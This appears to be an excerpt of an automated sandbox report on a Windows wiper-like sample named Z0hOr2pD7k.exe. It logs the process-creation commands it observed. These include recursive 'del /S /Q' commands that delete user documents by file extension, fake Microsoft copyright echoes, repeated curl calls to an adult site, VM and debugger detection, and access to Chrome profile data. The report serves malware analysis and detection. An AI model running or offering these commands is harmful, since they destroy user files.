Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nulJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect virtual machines (IN, VMware)Show sources
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeCode function: 0_2_009C1400 in eax, dx0_2_009C1400
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 408Jump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeCode function: 0_2_009C14A0 Sleep,72A73930,72A73930,GetModuleFileNameA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,769F8030,CloseHandle,GetTickCount64,Sleep,Sleep,769F8030,EnumWindows,CreateFileA,IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,KiUserExceptionDispatcher,KiUserExceptionDispatcher,Sleep,CloseHandle,0_2_009C14A0
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeCode function: 0_2_009C14A0 Sleep,72A73930,72A73930,GetModuleFileNameA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,769F8030,CloseHandle,GetTickCount64,Sleep,Sleep,769F8030,EnumWindows,CreateFileA,IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,KiUserExceptionDispatcher,KiUserExceptionDispatcher,Sleep,CloseHandle,0_2_009C14A0
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeCode function: 0_2_00A528C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00A528C0
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeCode function: 0_2_009C22F8 SetUnhandledExceptionFilter,0_2_009C22F8
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeCode function: 0_2_009C2195 IsProcessorFeaturePresent,72A73930,72A73930,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009C2195
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeCode function: 0_2_009C19E3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009C19E3
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready...Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft CorporationJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe CorporationJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESSJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Wait a minute...Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @echo OFFJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: unknown unknownJump to behavior
Source: Z0hOr2pD7k.exe, 00000000.00000002.917417847.0000000001930000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: Z0hOr2pD7k.exe, 00000000.00000002.917417847.0000000001930000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: Z0hOr2pD7k.exe, 00000000.00000002.917417847.0000000001930000.00000002.00000001.sdmpBinary or memory string: Progman
Source: Z0hOr2pD7k.exe, 00000000.00000002.917417847.0000000001930000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeCode function: 0_2_009C2405 cpuid 0_2_009C2405
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeCode function: 0_2_009C2082 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_009C2082

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\indexJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\b769a4d951e2b603_0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOGJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOGJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Visited LinksJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\indexJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.dbJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.dbJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCKJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.icoJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Last TabsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENTJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENTJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOGJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCKJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\c05775e9c4f00749_0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Current SessionJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000008Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\67c62b86322c36fa_0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\78ce8e30f78a2d10_0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\indexJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Trust TokensJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\TransportSecurityJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\CURRENTJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\the-real-indexJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.oldJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33ffb3f3969344d8_0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOGJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000bJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\MANIFEST-000001Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\CURRENTJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.logJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000aJump to behavior
